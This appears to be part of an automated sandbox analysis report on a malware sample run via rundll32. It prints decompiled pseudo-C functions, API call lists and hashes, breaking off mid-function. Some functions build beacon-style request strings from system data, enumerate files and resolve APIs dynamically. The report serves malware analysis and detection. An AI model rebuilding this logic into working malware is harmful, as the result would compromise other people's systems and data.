                                          • Opcode Fuzzy Hash: b45e5fce67b0cd3ebe6dbfba7741f391f495206c8f72cbe60950d842800ecc63
                                          • Instruction Fuzzy Hash: 5FB01231040100FBDE014B60DD08F05FF31FF50700F018012B2090507083364C71EB35
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E04BF9347(void* __ecx, signed char* _a4) {
                                          				void* _v8;
                                          				void* _t8;
                                          				signed short _t11;
                                          				signed int _t12;
                                          				signed int _t14;
                                          				intOrPtr _t15;
                                          				void* _t19;
                                          				signed short* _t22;
                                          				void* _t24;
                                          				intOrPtr* _t27;
                                          
                                          				_t24 = 0;
                                          				_push(0);
                                          				_t19 = 1;
                                          				_t27 = 0x4bfd330;
                                          				E04BF684E();
                                          				while(1) {
                                          					_t8 = E04BF32BA(_a4,  &_v8); // executed
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_push(_v8);
                                          					_t14 = 0xd;
                                          					_t15 = E04BFA5E9(_t14);
                                          					if(_t15 == 0) {
                                          						HeapFree( *0x4bfd238, 0, _v8);
                                          						break;
                                          					} else {
                                          						 *_t27 = _t15;
                                          						_t27 = _t27 + 4;
                                          						_t24 = _t24 + 1;
                                          						if(_t24 < 3) {
                                          							continue;
                                          						} else {
                                          						}
                                          					}
                                          					L7:
                                          					_push(1);
                                          					E04BF684E();
                                          					if(_t19 != 0) {
                                          						_t22 =  *0x4bfd338; // 0x70d9b58
                                          						_t11 =  *_t22 & 0x0000ffff;
                                          						if(_t11 < 0x61 || _t11 > 0x7a) {
                                          							_t12 = _t11 & 0x0000ffff;
                                          						} else {
                                          							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                          						}
                                          						 *_t22 = _t12;
                                          					}
                                          					return _t19;
                                          				}
                                          				_t19 = 0;
                                          				goto L7;
                                          			}














                                          APIs
                                            • Part of subcall function 04BF684E: GetProcAddress.KERNEL32(36776F57,04BF935F), ref: 04BF6869
                                            • Part of subcall function 04BF32BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04BF32E5
                                            • Part of subcall function 04BF32BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04BF3307
                                            • Part of subcall function 04BF32BA: memset.NTDLL ref: 04BF3321
                                            • Part of subcall function 04BF32BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04BF335F
                                            • Part of subcall function 04BF32BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04BF3373
                                            • Part of subcall function 04BF32BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 04BF338A
                                            • Part of subcall function 04BF32BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04BF3396
                                            • Part of subcall function 04BF32BA: lstrcat.KERNEL32(?,642E2A5C), ref: 04BF33D7
                                            • Part of subcall function 04BF32BA: FindFirstFileA.KERNEL32(?,?), ref: 04BF33ED
                                            • Part of subcall function 04BFA5E9: lstrlen.KERNEL32(?,00000000,04BFD330,00000001,04BF937A,04BFD00C,04BFD00C,00000000,00000005,00000000,00000000,?,?,?,04BF207E,?), ref: 04BFA5F2
                                            • Part of subcall function 04BFA5E9: mbstowcs.NTDLL ref: 04BFA619
                                            • Part of subcall function 04BFA5E9: memset.NTDLL ref: 04BFA62B
                                          • HeapFree.KERNEL32(00000000,04BFD00C,04BFD00C,04BFD00C,00000000,00000005,00000000,00000000,?,?,?,04BF207E,?,04BFD00C,?,?), ref: 04BF9396
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: 5379a830b17e92a9aa126e354a57ef0cc0ab278bc87730e969af8c389792d269
                                          • Instruction ID: 0e0ee0a330e51ac05b1dc4406686648164e359781a4feb1d2a93b5b7434b9354
                                          • Opcode Fuzzy Hash: 5379a830b17e92a9aa126e354a57ef0cc0ab278bc87730e969af8c389792d269
                                          • Instruction Fuzzy Hash: FA014CB6200205AAFB105FE6CD80B7AB6E9EB44364F4010BAFB4DC70E0D664FC8E5360
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04BF1B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				void* _t15;
                                          				void* _t21;
                                          				signed int _t23;
                                          				void* _t26;
                                          
                                          				if(_a4 != 0) {
                                          					_t15 = E04BF7BA9(_a4, _a8, _a12, __edi); // executed
                                          					_t26 = _t15;
                                          				} else {
                                          					_t26 = E04BF74B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                          					if(_t26 == 0) {
                                          						_t23 = _a8 >> 1;
                                          						if(_t23 == 0) {
                                          							_t26 = 2;
                                          							HeapFree( *0x4bfd238, 0, _a12);
                                          						} else {
                                          							_t21 = _a12;
                                          							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                          							 *__edi = _t21;
                                          						}
                                          					}
                                          				}
                                          				return _t26;
                                          			}

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,04BF690C,?,004F0053,070D9388,00000000,?), ref: 04BF1B60
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: cb05a8638410f94401d55ee38561c84d1fa5e113602764fd71486390bf38c136
                                          • Instruction ID: 754527fde19a5273899c5bdd14b6bb9fdfc6f8268551b53d2c2afe34bc6afd8c
                                          • Opcode Fuzzy Hash: cb05a8638410f94401d55ee38561c84d1fa5e113602764fd71486390bf38c136
                                          • Instruction Fuzzy Hash: D501623210020AFBDB219F99DC01FAA7B69FF04360F048499FB1D9A161E731AD24D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E04BFA872(intOrPtr* __edi) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _t15;
                                          				intOrPtr* _t21;
                                          
                                          				_t21 = __edi;
                                          				_push( &_v12);
                                          				_push(__edi);
                                          				_v8 = 0x1d4c0;
                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                          				while(1) {
                                          					_v16 = _t15;
                                          					Sleep(0x1f4); // executed
                                          					if(_v12 == 4) {
                                          						break;
                                          					}
                                          					if(_v8 == 0) {
                                          						L4:
                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                          						continue;
                                          					} else {
                                          						if(_v8 <= 0x1f4) {
                                          							_v16 = 0x80004004;
                                          						} else {
                                          							_v8 = _v8 - 0x1f4;
                                          							goto L4;
                                          						}
                                          					}
                                          					L8:
                                          					return _v16;
                                          				}
                                          				goto L8;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: b686af9171442f9d44b44b32dc35f31b5619975881258f47f75cd15530eb09e4
                                          • Instruction ID: 4f279d6327de493211381395a73dd3db793196e15ff7dd8be76967b29079ab03
                                          • Opcode Fuzzy Hash: b686af9171442f9d44b44b32dc35f31b5619975881258f47f75cd15530eb09e4
                                          • Instruction Fuzzy Hash: 7BF03C75D01218EFDB04DB94C888AEDB7B8EF08304F5080EAE60AA3140D3B46B89CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04BF60CF(void* __edx, void* __edi, void* _a4) {
                                          				int _t7;
                                          				int _t13;
                                          
                                          				_t7 = E04BF7A28(__edx, __edi, _a4,  &_a4); // executed
                                          				_t13 = _t7;
                                          				if(_t13 != 0) {
                                          					memcpy(__edi, _a4, _t13);
                                          					 *((char*)(__edi + _t13)) = 0;
                                          					E04BF147E(_a4);
                                          				}
                                          				return _t13;
                                          			}

                                          APIs
                                            • Part of subcall function 04BF7A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 04BF7A5E
                                            • Part of subcall function 04BF7A28: memset.NTDLL ref: 04BF7AD3
                                            • Part of subcall function 04BF7A28: memset.NTDLL ref: 04BF7AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04BF9F9F,?,?,04BF9C62,00000002,?,?,?), ref: 04BF60EB
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: 8222f0ca3e8d617cc4ea93e8729b161231327160d9995204d1106052ef4bb4f6
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: 85E08C76500129BBDB222AA8DC40DEF7F5CDF62691F0040A0FF0C9A205DA25EA24A7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 66%
                                          			E04BF514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                          				intOrPtr _v0;
                                          				intOrPtr _v4;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v48;
                                          				intOrPtr _v56;
                                          				void* __edi;
                                          				long _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t34;
                                          				intOrPtr _t35;
                                          				int _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t44;
                                          				intOrPtr _t51;
                                          				intOrPtr _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t71;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				int _t80;
                                          				intOrPtr _t81;
                                          				int _t84;
                                          				intOrPtr _t86;
                                          				int _t89;
                                          				intOrPtr* _t92;
                                          				intOrPtr* _t93;
                                          				void* _t94;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				intOrPtr _t101;
                                          				void* _t103;
                                          				int _t104;
                                          				void* _t105;
                                          				void* _t106;
                                          				void* _t108;
                                          				void* _t109;
                                          				void* _t111;
                                          
                                          				_t98 = __edx;
                                          				_t94 = __ecx;
                                          				_t26 = __eax;
                                          				_t108 = _a16;
                                          				_v4 = 8;
                                          				if(__eax == 0) {
                                          					_t26 = GetTickCount();
                                          				}
                                          				_t27 =  *0x4bfd018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t28 =  *0x4bfd014; // 0x3a87c8cd
                                          				asm("bswap eax");
                                          				_t29 =  *0x4bfd010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t30 =  *0x4bfd00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t31 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t3 = _t31 + 0x4bfe633; // 0x74666f73
                                          				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x4bfd02c,  *0x4bfd004, _t26);
                                          				_t34 = E04BF57AB();
                                          				_t35 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t4 = _t35 + 0x4bfe673; // 0x74707526
                                          				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                          				_t111 = _t109 + 0x38;
                                          				_t105 = _t104 + _t38;
                                          				_t99 = E04BF73E9(_t94);
                                          				if(_t99 != 0) {
                                          					_t86 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t6 = _t86 + 0x4bfe8cb; // 0x736e6426
                                          					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t89;
                                          					HeapFree( *0x4bfd238, 0, _t99);
                                          				}
                                          				_t100 = E04BF614A();
                                          				if(_t100 != 0) {
                                          					_t81 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t8 = _t81 + 0x4bfe8d3; // 0x6f687726
                                          					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t84;
                                          					HeapFree( *0x4bfd238, 0, _t100);
                                          				}
                                          				_t101 =  *0x4bfd324; // 0x70d95b0
                                          				_a32 = E04BF757B(0x4bfd00a, _t101 + 4);
                                          				_t43 =  *0x4bfd2cc; // 0x0
                                          				if(_t43 != 0) {
                                          					_t77 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t11 = _t77 + 0x4bfe8ad; // 0x3d736f26
                                          					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t80;
                                          				}
                                          				_t44 =  *0x4bfd2c8; // 0x0
                                          				if(_t44 != 0) {
                                          					_t74 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t13 = _t74 + 0x4bfe8a6; // 0x3d706926
                                          					wsprintfA(_t105 + _t108, _t13, _t44);
                                          				}
                                          				if(_a32 != 0) {
                                          					_t103 = RtlAllocateHeap( *0x4bfd238, 0, 0x800);
                                          					if(_t103 != 0) {
                                          						E04BF749F(GetTickCount());
                                          						_t51 =  *0x4bfd324; // 0x70d95b0
                                          						__imp__(_t51 + 0x40);
                                          						asm("lock xadd [eax], ecx");
                                          						_t55 =  *0x4bfd324; // 0x70d95b0
                                          						__imp__(_t55 + 0x40);
                                          						_t57 =  *0x4bfd324; // 0x70d95b0
                                          						_t106 = E04BF4D2C(1, _t98, _t108,  *_t57);
                                          						asm("lock xadd [eax], ecx");
                                          						if(_t106 != 0) {
                                          							StrTrimA(_t106, 0x4bfc294);
                                          							_t63 =  *0x4bfd2a4; // 0x24da5a8
                                          							_push(_t106);
                                          							_t15 = _t63 + 0x4bfe252; // 0x616d692f
                                          							_t65 = E04BF9DEF(_t15);
                                          							_v20 = _t65;
                                          							if(_t65 != 0) {
                                          								_t92 = __imp__;
                                          								 *_t92(_t106, _v4);
                                          								 *_t92(_t103, _v0);
                                          								_t93 = __imp__;
                                          								 *_t93(_t103, _v32);
                                          								 *_t93(_t103, _t106);
                                          								_t71 = E04BF666E(0xffffffffffffffff, _t103, _v32, _v28);
                                          								_v56 = _t71;
                                          								if(_t71 != 0 && _t71 != 0x10d2) {
                                          									E04BF6106();
                                          								}
                                          								HeapFree( *0x4bfd238, 0, _v48);
                                          							}
                                          							HeapFree( *0x4bfd238, 0, _t106);
                                          						}
                                          						HeapFree( *0x4bfd238, 0, _t103);
                                          					}
                                          					HeapFree( *0x4bfd238, 0, _a24);
                                          				}
                                          				HeapFree( *0x4bfd238, 0, _t108);
                                          				return _a12;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04BF5166
                                          • wsprintfA.USER32 ref: 04BF51B3
                                          • wsprintfA.USER32 ref: 04BF51D0
                                          • wsprintfA.USER32 ref: 04BF51F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF5203
                                          • wsprintfA.USER32 ref: 04BF5225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF5235
                                          • wsprintfA.USER32 ref: 04BF526C
                                          • wsprintfA.USER32 ref: 04BF528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BF52A9
                                          • GetTickCount.KERNEL32 ref: 04BF52B9
                                          • RtlEnterCriticalSection.NTDLL(070D9570), ref: 04BF52CD
                                          • RtlLeaveCriticalSection.NTDLL(070D9570), ref: 04BF52EB
                                            • Part of subcall function 04BF4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04BF52FE,?,070D95B0), ref: 04BF4D57
                                            • Part of subcall function 04BF4D2C: lstrlen.KERNEL32(?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D5F
                                            • Part of subcall function 04BF4D2C: strcpy.NTDLL ref: 04BF4D76
                                            • Part of subcall function 04BF4D2C: lstrcat.KERNEL32(00000000,?), ref: 04BF4D81
                                            • Part of subcall function 04BF4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D9E
                                          • StrTrimA.SHLWAPI(00000000,04BFC294,?,070D95B0), ref: 04BF531D
                                            • Part of subcall function 04BF9DEF: lstrlen.KERNEL32(?,00000000,00000000,04BF5335,616D692F,00000000), ref: 04BF9DFB
                                            • Part of subcall function 04BF9DEF: lstrlen.KERNEL32(?), ref: 04BF9E03
                                            • Part of subcall function 04BF9DEF: lstrcpy.KERNEL32(00000000,?), ref: 04BF9E1A
                                            • Part of subcall function 04BF9DEF: lstrcat.KERNEL32(00000000,?), ref: 04BF9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04BF5348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04BF534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 04BF535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04BF5360
                                            • Part of subcall function 04BF666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04BF6720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04BF5390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04BF539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,070D95B0), ref: 04BF53AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF53C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF53CF
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 146809abda298acb423959bf6f8e9e1dd0b37fbd4d1de7d6ba0f7789ce1bda06
                                          • Instruction ID: db74434e781eaf98c5084733e070f02a6c07e4c17ca09991277d5cb7694f2a33
                                          • Opcode Fuzzy Hash: 146809abda298acb423959bf6f8e9e1dd0b37fbd4d1de7d6ba0f7789ce1bda06
                                          • Instruction Fuzzy Hash: 2C61AE71500205AFDB21ABB8EC48E567BBCEB48304F050516FA0ED7251DB39ED5ADBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E04BFADA5(long _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				LONG* _v28;
                                          				long _v40;
                                          				long _v44;
                                          				long _v48;
                                          				CHAR* _v52;
                                          				long _v56;
                                          				CHAR* _v60;
                                          				long _v64;
                                          				signed int* _v68;
                                          				char _v72;
                                          				signed int _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t85;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t95;
                                          				intOrPtr* _t98;
                                          				void* _t102;
                                          				intOrPtr* _t104;
                                          				void* _t115;
                                          				long _t116;
                                          				void _t125;
                                          				void* _t131;
                                          				signed short _t133;
                                          				struct HINSTANCE__* _t138;
                                          				signed int* _t139;
                                          
                                          				_t139 = _a4;
                                          				_v28 = _t139[2] + 0x4bf0000;
                                          				_t115 = _t139[3] + 0x4bf0000;
                                          				_t131 = _t139[4] + 0x4bf0000;
                                          				_v8 = _t139[7];
                                          				_v60 = _t139[1] + 0x4bf0000;
                                          				_v16 = _t139[5] + 0x4bf0000;
                                          				_v64 = _a8;
                                          				_v72 = 0x24;
                                          				_v68 = _t139;
                                          				_v56 = 0;
                                          				asm("stosd");
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				if(( *_t139 & 0x00000001) == 0) {
                                          					_a8 =  &_v72;
                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                          					return 0;
                                          				}
                                          				_t138 =  *_v28;
                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                          				_t133 =  *(_t131 + _t76);
                                          				_a4 = _t76;
                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                          				_v56 = _t80;
                                          				_t81 = _t133 + 0x4bf0002;
                                          				if(_t80 == 0) {
                                          					_t81 = _t133 & 0x0000ffff;
                                          				}
                                          				_v52 = _t81;
                                          				_t82 =  *0x4bfd1a0; // 0x0
                                          				_t116 = 0;
                                          				if(_t82 == 0) {
                                          					L6:
                                          					if(_t138 != 0) {
                                          						L18:
                                          						_t83 =  *0x4bfd1a0; // 0x0
                                          						_v48 = _t138;
                                          						if(_t83 != 0) {
                                          							_t116 =  *_t83(2,  &_v72);
                                          						}
                                          						if(_t116 != 0) {
                                          							L32:
                                          							 *_a8 = _t116;
                                          							L33:
                                          							_t85 =  *0x4bfd1a0; // 0x0
                                          							if(_t85 != 0) {
                                          								_v40 = _v40 & 0x00000000;
                                          								_v48 = _t138;
                                          								_v44 = _t116;
                                          								 *_t85(5,  &_v72);
                                          							}
                                          							return _t116;
                                          						} else {
                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                          								L27:
                                          								_t116 = GetProcAddress(_t138, _v52);
                                          								if(_t116 == 0) {
                                          									_v40 = GetLastError();
                                          									_t90 =  *0x4bfd19c; // 0x0
                                          									if(_t90 != 0) {
                                          										_t116 =  *_t90(4,  &_v72);
                                          									}
                                          									if(_t116 == 0) {
                                          										_a4 =  &_v72;
                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                          										_t116 = _v44;
                                          									}
                                          								}
                                          								goto L32;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                          									_t116 =  *(_a4 + _v16);
                                          									if(_t116 != 0) {
                                          										goto L32;
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          						}
                                          					}
                                          					_t98 =  *0x4bfd1a0; // 0x0
                                          					if(_t98 == 0) {
                                          						L9:
                                          						_t138 = LoadLibraryA(_v60);
                                          						if(_t138 != 0) {
                                          							L13:
                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                          								FreeLibrary(_t138);
                                          							} else {
                                          								if(_t139[6] != 0) {
                                          									_t102 = LocalAlloc(0x40, 8);
                                          									if(_t102 != 0) {
                                          										 *(_t102 + 4) = _t139;
                                          										_t125 =  *0x4bfd198; // 0x0
                                          										 *_t102 = _t125;
                                          										 *0x4bfd198 = _t102;
                                          									}
                                          								}
                                          							}
                                          							goto L18;
                                          						}
                                          						_v40 = GetLastError();
                                          						_t104 =  *0x4bfd19c; // 0x0
                                          						if(_t104 == 0) {
                                          							L12:
                                          							_a8 =  &_v72;
                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                          							return _v44;
                                          						}
                                          						_t138 =  *_t104(3,  &_v72);
                                          						if(_t138 != 0) {
                                          							goto L13;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t138 =  *_t98(1,  &_v72);
                                          					if(_t138 != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				_t116 =  *_t82(0,  &_v72);
                                          				if(_t116 != 0) {
                                          					goto L33;
                                          				}
                                          				goto L6;
                                          			}

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04BFAE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 04BFAE9B
                                          • GetLastError.KERNEL32 ref: 04BFAEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04BFAEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: 7b0f6f7eafb382e00e8ac2d7f4623f82e63b898fe4acd2a8bb076b50a0b3dc79
                                          • Instruction ID: 9efe1a9e030f67774a585f725aac6749614284e974c5cc722d024b2ad538ddb8
                                          • Opcode Fuzzy Hash: 7b0f6f7eafb382e00e8ac2d7f4623f82e63b898fe4acd2a8bb076b50a0b3dc79
                                          • Instruction Fuzzy Hash: 7A811BB5A00209AFDB15CFA8D884AADB7F5FF4C710F14806AEA0DD7240E774E949CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 56%
                                          			E04BF30FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				signed int _v20;
                                          				void* __esi;
                                          				intOrPtr _t42;
                                          				intOrPtr _t44;
                                          				void* _t46;
                                          				void* _t47;
                                          				void* _t48;
                                          				int _t49;
                                          				intOrPtr _t53;
                                          				WCHAR* _t56;
                                          				void* _t57;
                                          				int _t58;
                                          				intOrPtr _t64;
                                          				void* _t69;
                                          				intOrPtr* _t73;
                                          				void* _t74;
                                          				intOrPtr _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t85;
                                          				intOrPtr _t88;
                                          
                                          				_t74 = __ecx;
                                          				_t79 =  *0x4bfd33c; // 0x70d9bb0
                                          				_v20 = 8;
                                          				_v16 = GetTickCount();
                                          				_t42 = E04BF9810(_t74,  &_v16);
                                          				_v12 = _t42;
                                          				if(_t42 == 0) {
                                          					_v12 = 0x4bfc19c;
                                          				}
                                          				_t44 = E04BF47E1(_t79);
                                          				_v8 = _t44;
                                          				if(_t44 != 0) {
                                          					_t85 = __imp__;
                                          					_t46 =  *_t85(_v12, _t69);
                                          					_t47 =  *_t85(_v8);
                                          					_t48 =  *_t85(_a4);
                                          					_t49 = lstrlenW(_a8);
                                          					_t53 = E04BF58BE(lstrlenW(0x4bfeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x4bfeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                          					_v16 = _t53;
                                          					if(_t53 != 0) {
